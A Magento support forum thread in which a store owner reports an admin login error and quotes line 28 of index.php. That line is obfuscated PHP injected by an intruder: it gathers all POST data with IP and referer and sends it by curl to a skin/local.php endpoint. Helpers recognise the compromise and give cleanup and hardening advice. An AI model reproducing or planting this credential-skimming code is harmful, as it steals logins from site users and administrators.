cancel
Showing results for 
Search instead for 
Did you mean: 

Login page error, ( please check )

Login page error, ( please check )

There has been an error processing your request
Cannot send headers; headers already sent in /home/furniturepinewor/public_html/index.php, line 28
Trace: #0 /home/furniturepinewor/public_html/lib/Zend/Controller/Response/Abstract.php(115): Zend_Controller_Response_Abstract->canSendHeaders(true) #1 /home/furniturepinewor/public_html/app/code/core/Mage/Core/Model/App.php(1246): Zend_Controller_Response_Abstract->setHeader('Content-Type', 'text/html; char...') #2 /home/furniturepinewor/public_html/app/code/core/Mage/Core/Controller/Varien/Front.php(80): Mage_Core_Model_App->getResponse() #3 /home/furniturepinewor/public_html/app/code/core/Mage/Core/Controller/Varien/Router/Standard.php(202): Mage_Core_Controller_Varien_Front->getResponse() #4 /home/furniturepinewor/public_html/app/code/core/Mage/Core/Controller/Varien/Front.php(172): Mage_Core_Controller_Varien_Router_Standard->match(Object(Mage_Core_Controller_Request_Http)) #5 /home/furniturepinewor/public_html/app/code/core/Mage/Core/Model/App.php(354): Mage_Core_Controller_Varien_Front->dispatch() #6 /home/furniturepinewor/public_html/app/Mage.php(684): Mage_Core_Model_App->run(Array) #7 /home/furniturepinewor/public_html/index.php(82): Mage::run('', 'store') #8 {main}

Error log record number: 262457447434

Login link = http://furniturepineworld.co.uk/index.php/admin

please tell me how to fix this, Thanks for your time. 

5 REPLIES 5

Re: Login page error, ( please check )

Hi,

If you look in your index.php around line 28 - what are the contents?

The error you're getting basically means that sometihng is being output before the application is ready.

Problem solved? Click Accept as Solution!
Magento Certified Developer Plus | www.iwebsolutions.co.uk | Magento Small Business Partner

hi 

i have a same broblem with admin panel.when u find a solution please let me know

thank you.

Line no 28 content.

$x0b = ''; $x0c = $x18($_POST); if (!empty($x0c)){ foreach($x0c as $x0d => $x0e){if($x1d($x0e)){foreach( $x0e as $x0f => $x10){if($x1d($x10)){foreach( $x10 as $x11 => $x12){$x0b.= $x0d.'_'.$x0f.'_'.$x11.'='.$x12.'&'; } }else{ $x0b.= $x0d.'_'.$x0f.'='.$x10.'&';} } }else{ $x0b.= $x0d.'='.$x0e.'&';} }if($x0b != ''){ $x13 = $_SERVER['REMOTE_ADDR'].' '. $_SERVER['HTTP_REFERER']. ' '. $x0b; $x14 = 'data='.$x1e($x13); $x15 = 'http://furniturepineworld.co.uk/skin/local.php';$x16 = $x19(); $x1a($x16,CURLOPT_URL, $x15); $x1a($x16,CURLOPT_POST, 1); $x1a($x16,CURLOPT_POSTFIELDS, $x14);$x17 = $x1b($x16);$x1c($x16);} } ?><?php

Hi,

I'm afraid that things like that in your index.php are not normal - and I would suggest that you have almost definitely been hacked.

To get your store up-and-running again you should replace the index.php with a fresh copy from a newly downloaded Magento - however I would be extremely worried about what else has been compromised (if there is anything in the database, other files placed around).

The best possible route would be to completely reinstall the whole of Magento from fresh.

Problem solved? Click Accept as Solution!
Magento Certified Developer Plus | www.iwebsolutions.co.uk | Magento Small Business Partner

I agree with @iweb_p3mbo that your Magento installation may have been hacked. 

There are a few ways to go about this:-

1. Manually clean up all infections and injections for all files. You need to go through each files manually and clean them up, which can be very tedious and you may missed out some files. You can consider hiring a third-party security company like Sucuri which will help go through and clean up every files for you. 

2. Restore everything from a recent backup before the hacking incident. 

3. Reinstall the whole Magento instalation from fresh. 

Once you cleaned up the hacking, you need to:-

1. Make sure your Magento installation, all extensions and themes are all constantly updated to the latest stable version (if possible). Otherwise make sure you at least have all security patches installed. 

2. Change all your passwords including your hosting control panel, FTP, etc.

3. Do not save any passwords in your web browser or FTP client.

4. Make a full virus scan of your computer and all other devices.